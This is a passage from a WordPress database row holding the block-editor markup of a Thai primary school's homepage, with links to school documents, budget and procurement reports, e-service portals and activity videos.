(299,2,'2024-08-30 10:13:18','2024-08-30 03:13:18','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_238a19-ce\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_55c486-08\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_55c486-08\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":4,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_66bc98-69\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_66bc98-69\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3d590e-59\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_c72802-2d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_c72802-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_3cadef-91\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3cadef-91\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d4147b-0f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d4147b-0f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_41d84f-8e\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_41d84f-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_17cef9-da\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_17cef9-da\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_a997a3-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_a997a3-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_13660f-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_13660f-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_702c0e-e7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_702c0e-e7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_0109ca-f6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_0109ca-f6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_b4c32e-bd\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_b4c32e-bd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-200\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/EIT_QRCode-1.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://www.facebook.com/profile.php?id=61556083436494&amp;sk=videos\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:video {\"id\":64,\"align\":\"center\"} -->\n<figure class=\"wp-block-video aligncenter\"><video controls poster=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/VTR-แนะนำโรงเรียน.png\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/วันครู-1.mp4\"></video></figure>\n<!-- /wp:video --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"abc6c06d\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"b0641f20\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"id\":260,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27-1024x576.jpg\" alt=\"\" class=\"wp-image-260\"/></figure>\n<!-- /wp:image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\">แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1vuZFLIWRkwFNN4GX0n7enJwyg8eDIzBQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vuZFLIWRkwFNN4GX0n7enJwyg8eDIzBQ/view?usp=share_link\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong><br>   <a href=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\">    - คู่มือฝ่ายบริหารงานงบประมาณ</a><br>      <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\"> - คู่มือฝ่ายบริหารงานวิชาการ</a><br>       <a href=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\">- คู่มือฝ่ายบริหารงานบุคคล</a><br>     <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\">  - คู่มือฝ่ายบริหารงานทั่วไป</a></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1ics-Zh-M3PJmB2iudN_y7YVcdRFtVcLi/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1ics-Zh-M3PJmB2iudN_y7YVcdRFtVcLi/view?usp=drive_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1s25QprjH5mZ-zGGQHfrL8aL1LztcZZVs/view?usp=share_link\" data-type=\"link\" 